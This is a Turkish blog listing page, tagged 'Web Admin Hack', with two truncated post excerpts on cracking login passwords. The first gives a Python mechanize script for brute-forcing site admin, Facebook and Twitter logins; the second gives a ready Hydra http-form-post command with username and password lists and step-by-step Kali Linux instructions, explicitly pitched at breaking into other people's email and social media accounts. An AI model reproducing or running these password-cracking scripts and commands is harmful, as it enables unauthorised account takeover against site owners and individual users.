Ana içeriğe atla

Kayıtlar

Web Admin Hack etiketine sahip yayınlar gösteriliyor

Python ile Hack (Mechanize)

Python ile site şifresi kırmak için (Site Admin,Face,Twit vb..) aşağıdaki kodları bir metin editörüne kopyalayıp web.py adıyla kaydedin. import mechanize br=mechanize.Browser() br.set_handle_robots(False) br.addheaders=[('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")] dos=open("loginweb2.txt","w+") dos.write(br.open("http://web.example.com/login.php").read()) dos.seek(0) text=dos.read() site=raw_input("Web Site:") postmail=raw_input("Post Mail:") postpass=raw_input("Post Pass:") postformid=raw_input("Post Form id:") username=raw_input("User:") txt=raw_input("Password Txt:") br.open(site) br.select_form(nr=int(postformid)) br[postmail]="xxxxxx@gmail.com" br[postpass]="yyy1zzz2" data=br.submit() print "Error Post Url:" print br.ge

Hydra Kullanımı (Web sitesi hack)

Hydra sadece web sayfalarının şifrelerini kırmaz. Ssh, Ftp gibi birçok parolalı giriş ekranına atak yapmaya yarar. İp , browser kimliği gibi listeler kullanılabilinir ve filtreler aşılabilinir. Ama ben burada en basit kullanımından ve direk çalışan kod satırlarından bahsedeceğim. Sadece web sitelerinin admin panellerini değil üye giriş panelleride kırılabilir. Kişinin mail adresi, Face şifresi, twit şifresi gibi. Bilenler için direk kod satırı; hydra   www.example.com   http-form-post  " /login.php : kullanici =^USER^& sifre =^PASS^:Erro" -L admin.txt -P sifre.txt Bilmeyenler için adım adım anlatımı; Linux işletim sisteminizi açın. Kali Linux (Önerilir) Öncelikle /root dizininde admin.txt diye dosya açıp ,içerisine satır satır. Admin kullanıcı adı olabilecek ihtimalleri yazın. Örneğin: Admin admin Yonetici yonetici gibi. Sonra sifre.txt dosyası açıp içerisine olabilecek şifre ihtimallerini girin. Kendi siteniz üzerinde deneme yapıyorsanız 5,6 adet